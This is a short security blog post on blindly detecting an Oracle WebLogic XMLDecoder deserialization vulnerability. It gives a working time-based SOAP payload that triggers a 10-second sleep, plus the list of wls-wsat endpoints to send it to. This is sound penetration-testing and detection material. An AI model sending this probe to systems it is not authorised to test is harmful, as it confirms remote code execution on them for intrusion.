Recently we faced a version of Oracle WebLogic vulnerable to CVE-2017-10271. The issue can be exploited to execute arbitrary Java code (and consequently arbitrary commands on the operating system of the application server).

The exploitation of the issue usually gives no output in server responses (it is “blind”). The best detection methods to find and confirm the presence of issues like this one are:

External service interaction (usually DNS resolution)

Time based

DNS resolution payloads have been published but our target implements strong egress filtering (including DNS resolution). In these situations, the best detection method in my option is the time based one.

This is a working time based detection payload (sleep of 10 seconds):

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java class="java.beans.XMLDecoder"> <object class="java.lang.Thread" method="sleep"> <long>10000</long> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> 1 2 3 4 5 6 7 8 9 10 11 12 <soapenv:Envelope xmlns : soapenv = "http://schemas.xmlsoap.org/soap/envelope/" > <soapenv:Header> <work:WorkContext xmlns : work = "http://bea.com/2004/06/soap/workarea/" > <java class = "java.beans.XMLDecoder" > <object class = "java.lang.Thread" method = "sleep" > <long> 10000 </long> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

To check for this issue the payload should be sent to the following paths:

/wls-wsat/CoordinatorPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/ParticipantPortType

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/RegistrationRequesterPortType11

Cheers!

*** EDIT: as the reporter of the vulnerability noted on Reddit, the CVE number is wrong and this seems to be widespread. The correct number is CVE-2017-10352 ***